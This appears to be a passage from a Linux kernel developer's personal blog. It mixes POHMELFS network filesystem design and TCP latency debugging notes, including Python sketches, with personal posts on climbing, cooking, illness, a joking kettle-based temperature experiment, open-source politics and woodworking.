I already found experimentally that a write-through cache scales very badly,
even noticeably worse than no cache at all for some workloads, so an ideal
solution
does not involve any kind of write-through operations, notably no synchronous commands
which require an immediate response.
This means that inode numbers will differ on client and server, so there should be
some kind of tracked dependency between them so that operations on different machines
can be done in sync. The initial thought was to use a binary tree to store pointers to the appropriate
inodes, which would be indexed on server and clients by a combination of hashes of the inode (direntry)
and its parent data. Even embedded systems can easily have millions of inodes, so the choice
seemed correct at first glance. Now I think differently, since there
is a serious problem with indexing such a tree.
Since the only information common to both client and server is the object name, it should be used
as a key, maybe not the name directly, but its hash, that does not matter at this point. Here comes a
problem with the binary tree choice: in a binary tree there is no connection between the real parent in the
filesystem and the parent in the binary tree, so there will be serious problems when we put two
different objects with the same name into the binary tree - there will be a conflict. To solve
this problem we should use some information about where this object is placed, i.e. information
about its parent directory. Using the parent name hash as a part of the key in the binary tree
does not solve the problem either, since there might exist multiple directories with the same name and
the same object in them. We could solve the problem by putting into the key a hash of the object's name
and a hash of the parent's key (which in turn is a hash of its name and a hash of its parent's key), so this
recursive hashing would end at the highest level (i.e. the root directory). This works, but there
might be a scalability problem because of the following issues:
server has to either cache opened directories or reopen them one-by-one when accessing an object
when an object is moved/renamed, all keys of its children and parent have to be changed
which is unacceptable. So a new solution was thought of.
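The recursive keying scheme and its rename problem can be shown in a few lines. This is a Python sketch under assumptions of mine: SHA-1 stands in for whatever hash would really be used, and `key` and `path_key` are hypothetical names.

```python
import hashlib


def key(name, parent_key):
    """Key of an object: hash of its name combined with its parent's key."""
    return hashlib.sha1(parent_key + b"/" + name.encode()).digest()


def path_key(path):
    """Fold the keys from the root (empty key) down to the object."""
    current = b""
    for part in path.strip("/").split("/"):
        current = key(part, current)
    return current


# Same object name, same parent directory name, different grandparents:
# the keys still differ, so there is no conflict in the tree.
print(path_key("/a/x/file") != path_key("/b/x/file"))  # prints True

# The price: renaming /a to /c changes the key of everything below it.
print(path_key("/a/x/file") != path_key("/c/x/file"))  # prints True
```

The second comparison is the scalability problem in miniature: a rename near the root forces every key in the subtree to be recomputed.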
So far I have two ideas:
kind of radix tree
multi-layer hash tables indexed by double name hash
While the former is kind of obvious, the latter is a quite interesting but very simple idea. Consider
that each directory has a hash table of its children, indexed by a double hash of the child's name.
We need a double hash to remove the possibility of collision (I can not prove mathematically (maybe only yet)
that there are two hashes which will not allow simultaneous collision in both, but I feel quite strongly
that such hash pairs exist) and to use them in network commands. Commands can be optimised either
to use the full path if it is short enough (just send a path string during writeback or readpage as a
path to where the data belongs) or to use an array of hashes of the path elements instead of '/' separated
names. The hash tables actually have to be changed to a different data structure capable of hosting not only
small hash values, but full 32 or 64 bit hashes. It can be a binary tree or a judy array, something similar
to what was used in
unified socket storage. The former looks a bit excessive.
Using such an approach it is possible to look up an object in O(k) operations, where 'k' is the number of directories
in a path. Very often it is smaller than 10; for a binary tree 10 steps correspond to only 2^10 = 1024 inodes,
which is too small for a real system.
This approach (especially when the full path is being sent) allows eliminating the scalability problems mentioned above.
Implementation start is scheduled for today, but I have to think about the details first.
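A toy version of the per-directory tables indexed by a double name hash might look like this. It is a Python sketch with assumptions of mine: CRC32 and a truncated SHA-1 are arbitrary stand-ins for the two hashes, a dict plays the role of the per-directory structure, and `Directory`, `double_hash`, `path_to_hashes` and `lookup` are hypothetical names.

```python
import hashlib
import zlib


def double_hash(name):
    """Two independent 32-bit hashes of a name (hash choice is arbitrary here)."""
    data = name.encode()
    h1 = zlib.crc32(data)
    h2 = int.from_bytes(hashlib.sha1(data).digest()[:4], "big")
    return (h1, h2)


class Directory:
    def __init__(self):
        self.children = {}  # (h1, h2) -> Directory or file payload

    def add(self, name, obj):
        self.children[double_hash(name)] = obj
        return obj


def path_to_hashes(path):
    """What a network command would carry instead of '/' separated names."""
    return [double_hash(part) for part in path.split("/") if part]


def lookup(root, hashes):
    """One table lookup per path element, i.e. O(k) for k elements."""
    node = root
    for h in hashes:
        node = node.children[h]
    return node


root = Directory()
a = root.add("a", Directory())
b = a.add("b", Directory())
b.add("file", "file payload")
print(lookup(root, path_to_hashes("/a/b/file")))  # prints file payload
```

Since every directory owns its table, renaming a directory only touches one entry in its parent; nothing below it has to be rekeyed.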
It had been quite a while since I last climbed, so today I reopened
the season. It was surprisingly good training, although I did not do that much,
only a couple of warm-up traverses and three new traces, which I had tried before
though. One of them was noticeably complex, but extremely interesting.
For those who visit Skala-city,
it is the trace over yellow holds in the right corner with 6c+ category.
Complex, and I did not even expect to complete it without falls, but
everything was better than expected - of course I fell, but eventually completed it.
At the end I moved to the sauna and shower. Excellent finish of the day!
I like it.
Zach Brown has announced
the opening of the CRFS source code.
CRFS is a network filesystem which works
with a remote BTRFS volume and supports
a cache on clients.
Here is a brief set of features CRFS supports:
the user space server exports a private BTRFS volume
the network protocol operates on ranges of BTRFS disk items
the kernel client provides posix semantics by operating on items
the server can grant and revoke client caches of data and metadata
The CRFS protocol is very tied to how BTRFS is organized. For example there is natural
batching of some commands like the recursive delete commands: since btrfs keys
are placed one-by-one, there is no need for an additional command to be sent, instead
the first one can be extended to cover a wider key range.
As you might notice, pohmelfs
was started as a competitor to the crfs project, because the latter is interesting and was closed. Right
now pohmelfs has a set of very interesting features crfs does not and likely will not support (like offline
working and support for different server filesystems), and its todo list has plenty of very interesting
stuff, so it will not be closed. Instead I plan to continue the competition (which is a bit
complex for me, since it is the first filesystem I write and essentially I did not know what an inode was
before) and fully complete pohmelfs. Although I subscribed to crfs-devel :)
My new shiny servers will be installed today, so tomorrow I will start the (re)implementation of
the ground ideas of
pohmelfs.
No, it's not yoga, I talked with people who did it regularly... It is not talking
with trolls, they are harmless. Trying to understand VFS or ext3, whose sources
are encrypted in the linux tarball, is interesting. Playing chess and 'go'
is just a warm-up.
Real patience is tested when you are cooking ravioli.
That is how I spent a Monday:
half an hour to make the dough
half an hour to cook up the minced meat
about 10-15 minutes to roll out a small piece of dough into a thin circle
about 20-30 minutes to make 10 ravioli
So, making the above set of them should take as long as 3 hours, so not that much.
That was the theory; in practice the dough for every third or fourth 'blank' wanted to run away
and did not allow its parts to be 'glued' together, which took 5-10 minutes
for each one to 'fix'. In some cases it ended up with smaller examples of 'Resident Evil'
creatures, like those you can find in the right part of the above picture.
Looks good? And really tasty.
So, forget yoga and chess - real patience is trained
by cooking.
There are two ways to point out mistakes made by others:
tell them "hey, you have an error :)" or "you have errors here and there".
This can end up with
"yeah, that's a good fix" or "you do not know these things, stop doing this".
It looks like there is no difference between the first messages, but the results
will contrast a lot. If you do not care
about communication with the person who made the mistake, but only care
about things getting fixed, it makes no difference how you point out the error,
but be ready (although you do not care) that the person will reply to you
quite aggressively and can resist making a fix if it is not vital
for the things being discussed. It is of course wrong and kind of childish,
but that is how people very frequently reply. If you care about communication
with the person in question, then speak the way you want to be spoken to.
It is actually not very simple, but do not expect an easy solution with
a teaching tone.
This reminds me of how kernel maintainers reply to people who make some contribution.
There are very good people who start a discussion in a friendly way even if the patch
or question is really wrong; this can end up with a pointer to the mail archive or faq.
There are persons (we all know who) who only reply: this is wrong,
you have a race. Sometimes the racy places are pointed out.
So, be cool with others and do not pretend to be the smartest one.
That of course touches me too... I'm frequently a hard one to talk with.
I believe that photographers who only make black and white photos
are not as good as those who do not fear making coloured photos.
BW ones are good almost every time, while coloured ones are usually not that
interesting, and changing them to BW frequently fixes the shot.
I am antisocial. Not always, but frequently. And never in good, well-known company.
Got a number of whiskey drops (solely for medicinal purposes) and made this creature.
So, the last several days, devoted mostly to thinking about these things and some
experiments with them, led me to the headline conclusion: pohmelfs was done
just wrong!
Its network ping-pong protocol is wrong, its inode resync logic and overall
need for inode number change is wrong, its writeback logic is wrong (btw, why does
Linux VFS call writeback for an inode after it calls writeback for the inode's pages?
This leads to duplication of the inode number resync code and a fair number of problems),
its userspace server cache is wrong (well, its userspace server is braindamaged,
but that does not prevent it from being wrong too), and most important: it is becoming complex,
so I frequently have to read my own code multiple times to understand what I meant here or
there.
That just has to be changed (mostly just removed)!
Thinking about all that crap led me to a more philosophical conclusion: any network
protocol which requires a precise acknowledgement for each packet is broken. Period.
TCP is not broken, since it can send acks for multiple packets. TCP can aggregate on both
sides of the connection (which can lead to a huge performance increase,
as was observed in the userspace network
stack over netchannels),
so it is a stream, not a ping-pong, although its policy for ack generation is not always the best decision.
Out of curiosity, why were the original ping and traceroute commands not implemented as TCP applications
which would catch ack/rst packets?
So, anything ping-pong like is just broken. Never ever use that logic at all, since it breaks performance
and the ability to extend. Moreover, it breaks the ability to create real duplex communication,
since while you expect an ack you can get data from the other peer for a different command.
So, the brilliant idea (yes, I sometimes get them from the deep abyss of the mindless) is to convert the POHMELFS
protocol into two real streams: one from client to server and a completely independent stream from server to client.
It has zillions of benefits, but let's see how it is going to be implemented and what will be fully broken in the filesystem.
First, there will not be resync logic. At all. Each inode (and its number) on the client will not correspond
to any inode object on the server, so local inodes will never be synced with the server ones. Instead the cache of objects
on the server side will be indexed by special keys containing name, length and other parameters needed for unique number generation.
The client inode number will never be sent to the server, so object creation will have only a single direction: just send a packet.
If there is an unrecoverable error, the connection can be broken, so subsequent command sending would reconnect or make some
changes. Things like permissions will be guarded by the client, though there might still be an out-of-space problem.
Second, commands, which require feedback from the server, like reading directory content will become completely
asynchronous, so feedback from the server will not be exactly a sync reply for given command, instead
we can wait until directory content was populated and start providing it back to VFS.
Third, and the main one, there is a possibility to stream commands both from client and server. Since clients
now do not require a sync ack/reply, commands can be batched for maximum performance, but that is not the main feature.
What is really interesting is the ability to receive a stream of commands from the server, so each of them can be parsed
independently from the original client command state. This allows implementing a cache coherency protocol without major
pain and having a high performance stream of data from server to client.
On top of that there is ->sendpage()/sendfile(), which are broken
without a proper acknowledgement, so to fix the issue I plan to submit a socket extension patch, which will call
an appropriate registered callback when the page reference counter is about to be dropped, which automatically means
the data was received on the remote side. This kind of acknowledgement does not slow the connection down more than
a simple unidirectional bulk transfer, so it is fast.
So, I started deleting lots of code and implementing the needed bits, the nearest future will show how broken my approach is.
This raises a question about design vs. evolution... I actually prefer the former, but frequently end up with the
latter (like this decision about the network protocol, which is a design, but only after several evolution steps
in the wrong direction). This reminds me of the kernel evolution topic, which does not actually show anything good
for the kernel: there are lots of dead-end evolutionary branches which
believe they are the top of the progress, maybe mankind is one of them...
That was a lyrical digression, so back to business!
All operations in pohmelfs are made locally and are propagated back to the server during writeback time
(or via the cache coherency algorithm, which is not implemented fully yet). POHMELFS uses
the writeback cache in all its power, which allows removing a directory of arbitrary size
using only a single network command.
During unlink/rmdir time the local object is removed and potentially destroyed, while a short reference
to what it was is stored in a sync list of the parent, which is marked as dirty. So, when writeback
hits the parent directory of the just removed object, it sends all information about the removed objects to the server.
So, when a directory with an arbitrary number of subdirs and other objects is recursively removed locally,
information is not sent, but added to the appropriate
parent subdirs, which are removed in their own turn, so when the whole subdir is removed, only a single object
becomes dirty - the parent of the just-removed directory, which contains information about the removed
dir. A message about this will be sent later (on writeback or because of the cache coherency protocol), which will
force the server to remove the whole subdir recursively. This is much faster than sending information about
every single object being removed during recursive removal of the directory.
Of course if writeback starts hitting pohmelfs inodes during deletion time it is possible that not only
information about the highest removed directory will be sent, but also about some underlying subdirs, but
that does not matter a lot, since this is a very short condition (inode is in dirty list and yet not removed
by the recursive removal) and number of such inodes is still much smaller compared to overall number of removed
objects.
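The removal logic above can be sketched in a few lines. This is a toy in-memory model, not the pohmelfs code: the `Node` class, its `sync_list` field and the `writeback()` helper are hypothetical names used only to show why a recursive removal ends up as a single message.

```python
class Node:
    """Toy stand-in for a cached inode (hypothetical, not the kernel structure)."""

    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent
        self.children = {}
        self.sync_list = []   # names of removed children not yet sent to the server
        self.dirty = False
        if parent is not None:
            parent.children[name] = self


def remove_tree(node):
    """Remove a non-root node and everything below it locally; return the count."""
    removed = 0
    for child in list(node.children.values()):
        removed += remove_tree(child)
    parent = node.parent
    del parent.children[node.name]
    # Only a short reference is left in the parent, which becomes dirty.
    parent.sync_list.append(node.name)
    parent.dirty = True
    node.parent = None        # the node and its own sync list are gone now
    return removed + 1


def writeback(root):
    """Collect (directory, removed name) messages from the surviving dirty nodes."""
    messages = []
    stack = [root]
    while stack:
        node = stack.pop()
        if node.dirty:
            messages.extend((node.name, name) for name in node.sync_list)
            node.sync_list.clear()
            node.dirty = False
        stack.extend(node.children.values())
    return messages


if __name__ == "__main__":
    root = Node("root")
    a = Node("a", root)
    b = Node("b", a)
    Node("c", a)
    Node("d", b)
    print(remove_tree(a), writeback(root))
```

The sync lists of the removed subdirectories disappear together with them, so the writeback pass only finds the entry left in the topmost surviving parent.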
Actually cache coherency algorithm is the last serious thing to implement in pohmelfs I think. There are bugs
of course and some feature extensions, but major milestone will be set after this got implemented.
Stay tuned!
We had a small chillout in 'The last drop' and at home later (and earlier, since the celebration
began right at 00:00, although Wijo said he was born at 10:00, that did not matter already).
Besides other interesting presents,
he got a bottle of Hennessy XO (yes, I was lazy enough and presented that simple stuff).
So I had a chance to compare it (before it was quickly finished) with other cognacs
I drank before. Well, my opinion about cognac being untasty coloured vodka was confirmed again.
IMHO Hennessy XO, VS and VSOP (Very Special Oshe Pizdets) are all not that interesting drinks,
just like the other cognacs I had. Next time
I will try Rémy Martin, but I think that it will be similar. Yep, I'm not a fan, but rum-m-m-m...
If something looks undebuggable at first view, then take a second one.
Better from a different angle. Some problems require a third look.
Bits of history of the problem.
Pohmelfs has extremely large latencies when syncing a local inode to the remote server.
This involves sending
a command to the server to create an object with the given name and receiving back
a response with its real inode information (like inode number and other
fields cached for faster stat() and similar workloads). Pohmelfs
then changes the local inode info to match the real data.
Syncing of a small tree of 500 files takes about 40 (!) seconds. Well, in the Xen
environment where I develop these things local creation of 500 files in a single
ext3 directory takes more than 15 seconds, but the other 25 are pure overhead.
That was short description of previous series.
Next, problems of fixing the problems.
First, the Xen version used on that testing machine is old enough that oprofile
does not work. Second, I do not know VFS internals well enough (this is my first filesystem,
the interested reader can find how I managed to step on likely every possible rake
in that field, some of them were even small kid rakes...) to determine where there
is a possibility to catch those long delays. A Linux filesystem is actually
not that complex a system, just a set of callbacks, so the implementation is not really outstanding,
but knowing in which condition each callback can be invoked and which problems can be
here or there is kind of a magic... Third, the remote userspace pohmelfs server was not actually
written by me, instead its bytecode was blown out because of some substances inspiration,
so it can very much be a reason for all the problems, although given that it is as trivial as
pretty much all my userspace code, even a total rewrite will not fix the issue.
So, the latency problem in pohmelfs looked really undebuggable. But you know, a cup of excellent
tea (from a tea bag) with lemon can fix any problem (or high temperature and substances,
or a fair amount of alcohol, everyone has fun the way he likes), so it was first
decided to implement
a simple network kernel module which would connect to a remote userspace server and exchange
messages in a similar fashion to what pohmelfs does.
Such a module was implemented, started and showed excellent performance (about 1 thousand messages
per second sent and received back in the test network, which is several orders of magnitude faster
than pohmelfs). So, move back to VFS and pray for inspiration.
Inspiration was met today (thanks Arnaldo, likely it is because I'm getting healthier :).
I always thought that a number of subsequent calls to recv() is not a good idea no matter
where: in kernel or userspace, since each takes the socket lock, which in turn can introduce the latencies found,
so I eliminated subsequent recvs in pohmelfs code (the testing module was written better and does
sending and receiving without such 'fragments'), which resulted in... nothing, results did not change
at all. So, wrong step, but having subsequent sending calls in a row is not a good idea either,
so I replaced them with allocation and copy, so that there would be only a single kernel_sendmsg()
call. As you might expect performance... changed by 30 times. Just having a single send call instead of two
for as much as 500 invocations forced the whole network exchange to behave completely differently.
So, to debug the problem further I extended the testing module and introduced the ability to send and receive
data not as a single packet but via two fragments: 4 bytes and the rest of the packet (60 bytes). Here is a result
table for 1000 messages sent and received back by the testing module:
no fragments: 1.43 seconds
send fragments (4 and 60 bytes): 40.43 seconds
recv fragments (4 and 60 bytes): 1.43 seconds
both fragmentations: 40.43 seconds
It is about a 30 times difference just for a simple application change! tcpdump on the receiving side shows that
sending subsequent fragments results in a real message being sent
every time kernel_sendmsg() is invoked, which results in an ack for each such message (both 4 and 60
bytes), which completely degrades the tcp window, and the connection just can not recover with such behaviour.
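The difference between the two sending styles can be shown in userspace as well. The sketch below is not the kernel testing module: it assumes a hypothetical wire format (a 4-byte big-endian length header followed by the payload) and uses the standard Python `socket` and `struct` modules. `send_fragmented()` issues two send calls per message, `send_coalesced()` copies header and payload into one buffer first, which is the fix described above.

```python
import socket
import struct


def send_fragmented(sock, payload):
    """Two send calls per message: 4-byte header, then the payload."""
    sock.sendall(struct.pack("!I", len(payload)))
    sock.sendall(payload)


def send_coalesced(sock, payload):
    """One send call per message: header and payload copied into one buffer."""
    sock.sendall(struct.pack("!I", len(payload)) + payload)


def recv_exact(sock, size):
    """Read exactly `size` bytes or raise if the peer closed the connection."""
    buf = bytearray()
    while len(buf) < size:
        chunk = sock.recv(size - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf.extend(chunk)
    return bytes(buf)


def recv_message(sock):
    """Receive one length-prefixed message."""
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return recv_exact(sock, length)


if __name__ == "__main__":
    left, right = socket.socketpair()
    send_coalesced(left, b"x" * 60)
    print(len(recv_message(right)))
    left.close()
    right.close()
```

Both functions put the same bytes on the wire, so the receiver does not care which one was used; only the number of send calls differs. A local socket pair will not reproduce the timings from the table, that needs a real TCP connection between two hosts.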
So, all those words were written just to show that even problems which look undebuggable at first view can be easily
solved, and that harmless (at first view again) programming mistakes can lead to very interesting results...
Now back to the drawing board to think how to improve the pohmelfs protocol even more to get the last bits out of the wire.
Btw, the interested reader can get my network testing module and userspace server from their
just created homepage.
I can not make a photo of the workplace, where the wood plates are placed,
because of the ever crappiest repair service of Nikon, so enjoy that
pseudo-graphics instead :)
Originally it was supposed to host not only bottles of wine (I do not
drink wine though), beer and strong alcohol, but also some books,
but I made a mistake in the design which was further increased when
the plates were sawn by other people (well, I gained a huge experience of not
letting others do the thing I can do better, even if I pay them for that),
so the cells became smaller (each can now host only about 5-6 classical
(0.5l) bottles of beer, each side of the square is about 17 cm)
and have a cut side. Both these issues forced me
to rethink the design a little bit, so now the shelves have reduced functionality,
but look probably even more interesting than in the original design.
So far I have not finished polishing the wood and have not started staining
and plastering it, but only constructed the whole structure on the floor,
so it will take a while to finish, but the result is expected to be worth all
the efforts.
One told me that there is something similar in Ikea, well, there is always
something similar in Ikea no matter what you created or only thought
about, but that completely does not matter - only process of creation
matters and that is the most interesting and important.
Trying to make at least something while being fscking sick.
I've created a simple traffic simulator, which contains a variable number
of cars and lights, each of which can be programmed with different acceleration,
maximum allowed speed, stop and deceleration distances. Each light can be
programmed to switch after a different interval. There are only two lights
in real life: red and green (at least in Moscow, very unfortunately), no one
ever cares about yellow, lots of drivers specially accelerate when they see yellow...
So, only two colors.
Since I did not bother to implement a nice config for each car and light,
there is only a single set of parameters, but command line parameters allow
varying the initial number of cars and the distance between them, the number of time frames before
lights change state or a new car enters the road, the number of lights
and the distance between them.
There are two known problems with the lights on the road: first, bad drivers,
who do not maintain a big enough buffer, so they have to wait until the car
in front of them moves far enough so they can start, which takes some time
from the limited timeframe of the green light. If the buffer is large enough, drivers
can start simultaneously and thus move much faster.
One can simulate this behaviour with a variable initial number of cars and with different distances between
them. If the distance is less than the stop distance (i.e. the distance where the driver has to
stop the car, it is 4 in the current setup), then the driver will have to wait
until the distance becomes more than or equal to the stop distance. If the driver stopped farther than the
stop distance (let's say 5 'meters'), then the car can start simultaneously with the head. The latter
approach allows moving more cars through the light during a fixed time frame,
but psychologically it looks better to stay as close as possible to the head
car, which introduces a latency, since we have to wait until the head car moves far enough
so we could start. This leads to a negative exponential speed increase for each car
behind instead of linear speed if drivers maintained the buffer. The appropriate
equations are quite simple: the difference of the distance moved in a single
time frame is proportional to the acceleration of the head car, which in turn
is proportional to its coordinate, so we have a simple differential equation,
whose solution results in a negative exponential. One can read a bit more
here.
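The buffer effect can be tried with a much smaller model than the real simulator. The sketch below is not the `traffic` program: it is a hypothetical single-light, single-lane model where only the stop distance of 4 is taken from the text, and the acceleration, maximum speed and number of frames are assumed values. A car may accelerate only when the car ahead is at least the stop distance away.

```python
def cars_through_light(n_cars, gap, stop_distance=4, accel=1, vmax=5, frames=20):
    """Count cars that pass a light at position 0 during `frames` green frames.

    Cars start standing still, the head car at the light and every next car
    `gap` units behind the previous one.
    """
    pos = [-i * gap for i in range(n_cars)]
    vel = [0] * n_cars
    for _ in range(frames):
        # Head car first, so followers see the already updated car ahead.
        for i in range(n_cars):
            if i > 0 and pos[i - 1] - pos[i] < stop_distance:
                vel[i] = 0          # too close to the car ahead: keep waiting
                continue
            vel[i] = min(vel[i] + accel, vmax)
            pos[i] += vel[i]
    return sum(1 for p in pos if p > 0)


if __name__ == "__main__":
    # Compare a queue with a buffer (gap 5) and a tight queue (gap 2).
    print(cars_through_light(30, 5), cars_through_light(30, 2))
```

With a gap of at least the stop distance all cars start in the same frame. With a smaller gap every car starts one frame later than the car in front of it, and in this model that delay costs more than the shorter queue saves.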
Second problem is light interval. If interval is too short, then cars can not start,
only couple of them moves forward, and if it is big enough, then during red light
a large backlog of cars can be accumulated, and it will not be removed during green light
because of the above problem: each car has to wait until head one moves to some distance.
The latter is actually worse, since backlog can become so huge, that it will not be removed
at all, which will lead to complete stall of the traffic flow (at the back side, front one will
move, but number of cars at the tail will be bigger than number of cars which leave the
traffic jam).
One can play with the program, called traffic.
It requires the gtk2 devel package installed. The homepage contains essentially the same text
and a link to the source code.
It also shows a usage example.
David Howells of RedHat recently posted the next round of his CacheFS implementation.
The main idea of the project is to
store data and metadata modifications locally on disk.
The cache is implemented as a write-through one. Locally data is stored as
usual files on a special partition formatted as one or another filesystem.
David also posted benchmarks of his approach.
Metadata intensive operations showed a significant slowdown
with the local on-disk cache, getting metadata from the local cache also shows
a slowdown. The former can be explained by the write-through nature of the cache
and slow local disk operations, which is also a reason for the slower metadata
reading.
There is also no cache-coherency algorithm implemented for CacheFS. Another problem,
also pointed out by Kevin Coffman, is possibly slower reading of data from the cache than
from the local filesystem (and from the remote one if bandwidth is not a limiting
factor, which is frequently the case).
This is the third (actually the first :) local cache implementation for a network
filesystem, so the competition between CRFS, POHMELFS and CACHEFS becomes even
more interesting :)
Stay tuned!
As was mentioned, full inode resync logic is very slow.
The latency is likely introduced somewhere at the protocol layer used
by pohmelfs. To test this scenario and find out the best possible
solution I implemented a trivial network module and userspace server, which
talk to each other via a protocol very similar to what is used in lookup/create
operations in pohmelfs. Server and client also maintain trees of the objects
they sent/received, so that the model would be as similar as possible to
pohmelfs usage patterns.
It's time to test things and find out where the problem lies, but as usual
there are problems. You are sick, everything is aching, but you
want to beat the crap, to move a bit further, to make something
interesting, so you start implementing the tiny bits, you start thinking,
you finally make the things, so you become happy and proud, and that is
just to find out, that all testing machines you had access previously
are turned off, and new ones are behind a firewall and there is no access
to the network from the ass of the world. This is called 'shit happens'.
At least yum developers do not know, that there are systems
with less than 1 Gb of RAM. And it is not even about how slow yum
is. Not about the fact, that to install 30 kb application yum will
download 3.5 Mb sqlite database file.
It is about yum programming bugs:
As you might expect, all 70+ packages above also got 'Cannot allocate memory'
error. My laptop has 256 Mb of RAM and 512 Mb of swap, more than a half was free.
After trying to start the same process again, after some applications were killed to get
free memory, yum refused to install packages because of broken
dependencies...
But libebml has one FC6 version. For the record, FC6 was never
installed on this laptop:
libebml-0.7.7-2.fc6
libebml-0.7.7-3.fc8
Fedora Core also forces an FC9 stopper bug into a needinfo one without any single
patch/version to test (at least I did not receive any such mail),
opened with a perfect description, with the probability of a buffer overflow
somewhere in image processing/rendering code, with a 100% reproducible example and an image
to test with, even after another person reported the same problem on rawhide
(and marked it as fc9 stopper).
How the hell do you expect to get some info after two months of silence from developers?
(one month after the bug was confirmed in rawhide)
Some people still believe in miracles...
I would like to test it right now, but I can not because of yum problems...
Old packages, as you might expect, still have that bug somewhere.
World is far from being perfect :)
I will not turn it off or suspend, I do not believe it will work after that. Instead
I will wait until I am capable of getting a new DVD with some other distro. And it
will not be Debian either.
For the first time in my life I called a doctor.
The doctor happened to be a nice-looking woman less than 30 years old,
we nicely talked about my sickness, and how (un)successful the cure was.
Since it is the first time I used some drugs (except aspirin) to cure
the sickness (I believe it is a flu), I managed to miss the point when taking the drug
should be started, so it was not very useful. After a quick look at me
she found so many possible crappy things I could have that I began to get scared.
I always knew that the less one knows the better one sleeps, but after
a set of questions and 'no, I do not' answers, the sky became a bit less cloudy...
She gave me a list of needed drugs to get, described what the heck
it is (flu, which forced some complications: something like
bronchitis), so now I feel a bit better, but will be ill (according
to her prognosis) at least all this week or maybe a bit more.
Modulo temperature I feel not that bad, but when it starts rising
after the drug (aspirin) stops working, I start feeling like shit, deja vu.
I actually tried two anti-temperature drugs: aspirin and paracetamol.
The former kicks the temperature in about 30 minutes, but frequently
this results in excessive hyperhidrosis, while the latter acts only in an hour
or so, but without any bad effects.
So, as you might notice, there are no updates about tons of my projects
because of this fucking sickness, but I expect soon to be able to kick
its ass so things would be in a good shape again.
Such (crappily forced) 'vacations' make the brain sleep almost all the time,
so when this is ended, I expect even higher rates and more
interesting stuff to happen.
Let's suppose one does not have a thermometer, but there are lots
of instruments and equipment around, starting from a screwdriver to drills, from a simple
ammeter/voltmeter to a laptop. As a hint: there is also electricity,
water and an automatic teakettle.
The task is to measure the temperature of your own body and decide to take or not
to take an aspirin. Or to have some fun with the process because of the quite boring
sickness.
Solution is pretty geeky, but first try to think about it yourself.
So, the solution.
It is based on the fact that when a human body or part of it is placed
into an environment with essentially the same temperature, but much
bigger thermal capacity, it does not feel this.
Try taking a shower at about 36 degrees Centigrade, and you will feel neither
cold nor hot. Things are different when the air on the street is more than 30 degrees
Centigrade, that is because of the very different thermal
capacity of water (it is huge) and air (very small).
So, back to the task. To determine your temperature you have to get a precise
volume of water in the teakettle (let's say 1 liter, I could measure it because
I have water counters), connect the teakettle to the electricity via an ammeter, and measure
the voltage with a voltmeter.
Then you have to put your arm into the teakettle and turn it on (beware of the heating
element) and note the first time. When your hand feels very comfortable
(here is the main error factor) you have to note the second time. Then remove your arm
and wait until the water boils and write down the third time.
Now, it's time for school physics: the power of the teakettle, which is equal
to the product of current strength and voltage, multiplied by the
time difference is equal to the mass of the water multiplied by its thermal capacity
and the temperature difference, which was reached during the above time frame.
So, here are practical results:
current strength I = 3.7 A
voltage V = 231 V
mass of the water m = 1 kg
thermal capacity of the water c = 4200 J/(kg*degree)
time difference for complete boiling (from unknown temperature to 100 degrees Centigrade) dt0 = 420 seconds
The temperature difference dT can be found from the following equation:
I*V*dt0 = m*c*dT
So, we have dT = 100 (temperature of boiling) - T0 (initial temperature
of the water) = I*V*dt0/(m*c), which is equal to about 85 degrees Centigrade, so the initial
temperature of the water was about 15 degrees Centigrade.
The time difference between the start of the process and the comfortable temperature
was about 30 seconds, so placing this timeframe into the above equation we can find
that the temperature changed by about 6 degrees.
Since we already found that the initial temperature was about 15 degrees Centigrade,
the calculated temperature of my body is about 21 degrees Centigrade.
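The arithmetic is easy to re-check. The snippet below just plugs the measured values from the text into I*V*dt = m*c*dT; the function and variable names are made up for this check.

```python
def temperature_rise(current_a, voltage_v, seconds, mass_kg=1.0, capacity=4200.0):
    """Temperature change of the water from I*V*dt = m*c*dT."""
    return current_a * voltage_v * seconds / (mass_kg * capacity)


# Measured values from the text: 3.7 A, 231 V, 1 kg of water.
rise_to_boil = temperature_rise(3.7, 231, 420)     # heating until boiling
initial_temperature = 100 - rise_to_boil           # water temperature at the start
rise_to_comfort = temperature_rise(3.7, 231, 30)   # heating until 'comfortable'
body_temperature = initial_temperature + rise_to_comfort

if __name__ == "__main__":
    print(round(rise_to_boil, 1), round(initial_temperature, 1),
          round(rise_to_comfort, 1), round(body_temperature, 1))
```

Without rounding the intermediate values the result is slightly below 21 degrees, so rounding is not what makes the answer absurd.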
It's time to go back to the grave...
P.S. Yes, I'm a former loser-physicist, that's why I became a kernel hacker, this can
explain a lot...
Here are a number of interesting moments in this miserable melodrama
(got via Linux Today News).
Stallman wanted to visit Russia this March, and parliament member Viktor Alksnis
promoted his visit and wanted to help with 'administration issues'.
Then LOR (www.linux.org.ru, one of the most popular linux sites
in Russia) moderator Sergey Udaltsov (who lives in Ireland)
sent a letter to Richard, where he
pointed out that Alksnis is not a good man, and also mentioned Alksnis'
"fight against the independence of the Baltic countries" in the late 80s.
Stallman then said that he does not want Alksnis to organize his visit.
Well, my couple of points about this stupid situation.
First, Alksnis is really not a very smart person in IT, and it looks
very much like he is a usual careerist, since I do not know about his
work at all except stupid idea of creation of 'national OS',
probably using 'nanotechnologies' (it is a modern trend here :).
Second, the step of Sergey Udaltsov is very well braindamaged - while it is ok to
describe who Alksnis is, pointing to Baltic independence is even
more stupid than the 'national os' idea.
So, my simple point is that both Viktor Alksnis and Sergey Udaltsov just
wanted to make some self-advertisement profit from Richard Stallman's visit
and do not really do it because of open source. Although
self-advertisement is not a bad idea (you read this blog :), such movements
are stupid.
If Stallman got problems with a visa (I would be surprised if it takes more than two weeks),
then it means he does not really want to
visit Russia. For example, I got the kernel summit invitation more than two months
ahead of the meeting, which was enough to get a visa (it required two (!) visits
to the UK visa office just to give and get back documents,
it took two (!) days to check documents, and it was
possible to order a courier,
although the previous year the time frame was shorter). If he does not want to,
why would we care?
If someone wants to visit a country, he can find a way to do that himself
and not wash his own brain with stupid rhetoric.
I think it will be a reason for Richard not to visit, since it really
looks like he does not want to do it :)
Well, when you are sick it is generally not a very good idea
to work on something, but this state can produce very interesting
ideas. So, I decided to change my table,
so I 'disconnected' a leg (there is only one, the other side is connected to the wall near the window),
removed all varnish layers using a plane, polished it
a bit with a grinding machine and painted both sides of the table
with a new dark chocolate colour. Looks pretty good, but since the hardboard (orgalite)
used on both sides is made out of wood fibers, it is not 100% smooth.
A second layer of the colour is mandatory, and it is possible
